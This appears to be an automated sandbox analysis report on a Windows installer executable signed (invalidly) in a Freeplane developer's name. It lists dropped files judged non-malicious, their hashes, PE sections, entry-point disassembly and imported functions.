              Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
              Process:C:\Windows\System32\msiexec.exe
              File Type:data
              Category:dropped
              Size (bytes):512
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:
              MD5:BF619EAC0CDF3F68D496EA9344137E8B
              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
              Malicious:false
              Reputation:unknown
              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\msiexec.exe
              File Type:Composite Document File V2 Document, Cannot read section info
              Category:dropped
              Size (bytes):49152
              Entropy (8bit):1.884363896372917
              Encrypted:false
              SSDEEP:
              MD5:F23DAB9FE40E6F5BF36605895C8A9C2E
              SHA1:E609497B9333AB0A2949BF066A49AFFC3DE1E9B9
              SHA-256:7BF9E37239A01880D6A79473A908FD9503FE5B239BAC67EDBD3853C8F69A32A8
              SHA-512:670115F90FE9049E4779642CDCBF399A361086B5C5986FFFEC3A157F838F726DF1D3CB34260425621D1C83C58351E985354998C2F0189E24450F2EA5BC52FCD0
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\System32\msiexec.exe
              File Type:data
              Category:dropped
              Size (bytes):32768
              Entropy (8bit):1.0382395074729112
              Encrypted:false
              SSDEEP:
              MD5:82574E966C1F79BBF070F925E84EEF6E
              SHA1:BCE3E0995D175FF675CB228E6BDE38F8EAEB5D41
              SHA-256:A12457B566AE189D738DB217C94F971F36DDFB65A680CA9D55B2745532D902A6
              SHA-512:26E234BA7D72EBCB86991341D798A3CA16518D638B71D9035B38E0F401C569A99F0BD481D01FE6035B62BED44D868AD988E4749D91D49C4C57D5B7C305C08571
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\System32\msiexec.exe
              File Type:data
              Category:dropped
              Size (bytes):81920
              Entropy (8bit):0.7488786433389204
              Encrypted:false
              SSDEEP:
              MD5:0290F0C81075AFDA9F4814F84378D2F3
              SHA1:68189B2C6D66C5EA1DC6C6438DC293470537BE58
              SHA-256:0C0CAB1F30F3B84447AD13FDA6BAE0820917317AE8FD10FFD03718AD6D023C44
              SHA-512:92B9CDBF0B70184B73113AFEF291FFBAF2DAF81B2104E04B71CD551D9BA620A7061668471596BE470164A990A736A74B1E3971FFF40D89F6339CB9B6521E6721
              Malicious:false
              Reputation:unknown
              Preview
              Process:C:\Windows\SysWOW64\PING.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):331
              Entropy (8bit):4.92149009030101
              Encrypted:false
              SSDEEP:
              MD5:2E512EE24AAB186D09E9A1F9B72A0569
              SHA1:C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B
              SHA-256:DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F
              SHA-512:6B4487A088155E34FE5C642E1C3D46F63CB2DDD9E4092809CE6F3BEEFDEF0D1F8AA67F8E733EDE70B07F467ED5BB6F07104EEA4C1E7AC7E1A502A772F56F7DE9
              Malicious:false
              Reputation:unknown
              Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.999796402582181
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:JWQgbclQK5
              File size:33'220'376 bytes
              MD5:41bf2693033eaed432dfa5c1d75cdeec
              SHA1:ff038cb9e992a518106c80868176785e987c301d
              SHA256:148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
              SHA512:f8ffe83afac20f3fc2b0175542e0e98cc236d3ab6e6cdf7d3702b5b124af6b64e8edd2d6ddddda6bdf6a2288f8853c56fed3bcf490227a0867baeb2bf8cb80ff
              SSDEEP:786432:ELlFuTirkoTj4mAJidZgSekJEUlvgBNTTz+Ndz+t:fqjzddlekmg4LU+t
              TLSH:547733837DE890C5EBF56CB73ACF4EDC869588D815B1369236220C4C2A736AD7833B55
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y...s...,...s...r.!.s.......s...x...s.......s.......s.^.u...s.Rich..s.........PE..L....S.L...........
              Icon Hash:55b2b271f8ecac55
              Entrypoint:0x414b04
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:
              Time Stamp:0x4CE553F7 [Thu Nov 18 16:27:35 2010 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:3786a4cf8bfee8b4821db03449141df4
              Signature Valid:false
              Signature Issuer:CN=Certum Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
              Signature Validation Error:The digital signature of the object did not verify
              Error Number:-2146869232
              Not Before, Not After
              • 31/10/2022 15:53:10 31/10/2023 15:53:09
              Subject Chain
              • E=dimitry@freeplane.org, CN="Open Source Developer, Dimitry Polivaev", O=Open Source Developer, L=Munich, C=DE
              Version:3
              Thumbprint MD5:8F254D12333030452B3114F8B9F4208E
              Thumbprint SHA-1:D6BE02881A5F2530791AB03F7A18B1B1D3C9152C
              Thumbprint SHA-256:E2FD5160A7B60D5A17A40C44A2F58D35EE6F854A52321569A1B8F5951294E47E
              Serial:6D59D71C2A65BA86924D4B3787C85555
              Instruction
              push ebp
              mov ebp, esp
              push FFFFFFFFh
              push 0041B9E0h
              push 00414A2Ch
              mov eax, dword ptr fs:[00000000h]
              push eax
              mov dword ptr fs:[00000000h], esp
              sub esp, 58h
              push ebx
              push esi
              push edi
              mov dword ptr [ebp-18h], esp
              call dword ptr [0041B074h]
              xor edx, edx
              mov dl, ah
              mov dword ptr [004233D0h], edx
              mov ecx, eax
              and ecx, 000000FFh
              mov dword ptr [004233CCh], ecx
              shl ecx, 08h
              add ecx, edx
              mov dword ptr [004233C8h], ecx
              shr eax, 10h
              mov dword ptr [004233C4h], eax
              push 00000001h
              call 00007F478C6D113Bh
              pop ecx
              test eax, eax
              jne 00007F478C6D02AAh
              push 0000001Ch
              call 00007F478C6D0368h
              pop ecx
              call 00007F478C6D0BEDh
              test eax, eax
              jne 00007F478C6D02AAh
              push 00000010h
              call 00007F478C6D0357h
              pop ecx
              xor esi, esi
              mov dword ptr [ebp-04h], esi
              call 00007F478C6D2D5Ch
              call dword ptr [0041B078h]
              mov dword ptr [00425A3Ch], eax
              call 00007F478C6D2C1Ah
              mov dword ptr [00423340h], eax
              call 00007F478C6D29C3h
              call 00007F478C6D2905h
              call 00007F478C6D2360h
              mov dword ptr [ebp-30h], esi
              lea eax, dword ptr [ebp-5Ch]
              push eax
              call dword ptr [0041B07Ch]
              call 00007F478C6D2896h
              mov dword ptr [ebp-64h], eax
              test byte ptr [ebp-30h], 00000001h
              je 00007F478C6D02A8h
              movzx eax, word ptr [ebp+00h]
              Programming Language:
              • [ C ] VS98 (6.0) SP6 build 8804
              • [C++] VS98 (6.0) SP6 build 8804
              • [ C ] VS2010 build 30319
              • [ASM] VS2010 build 30319
              • [EXP] VC++ 6.0 SP5 build 8804
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x1e9e40x64.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x270000x6294.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x1fabd880x2990
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x1f8.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x199ea0x19a008c9346b8cd91e8d7aa2e1586eb1a1b30False0.5822884908536585DOS executable (COM)6.608494417524647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x1b0000x44940x46005e256dc61db6deff01801e77de19d038False0.31166294642857145data4.368016436198423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x200000x5a480x32001d347e5500f0d4c5672ba18282b866f7False0.122890625data1.370539432871311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .sxdata0x260000x40x20035925cfdc1176bd9ffc634a58b40ec17False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x270000x62940x640079d24eee2154b34203ee7208408b248fFalse0.9487109375data7.806413411168127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0x271a80x5c94PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9929535864978903
              RT_DIALOG0x2ce3c0xb8dataEnglishUnited States0.6684782608695652
              RT_STRING0x2cef40x94dataEnglishUnited States0.668918918918919
              RT_STRING0x2cf880x34dataEnglishUnited States0.6538461538461539
              RT_GROUP_ICON0x2cfbc0x14dataEnglishUnited States1.05
              RT_VERSION0x2cfd00x2c4dataEnglishUnited States0.4901129943502825
              DLLImport
              OLEAUT32.dllVariantClear, SysAllocString
              USER32.dllSendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
              SHELL32.dllShellExecuteExA
              KERNEL32.dllGetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States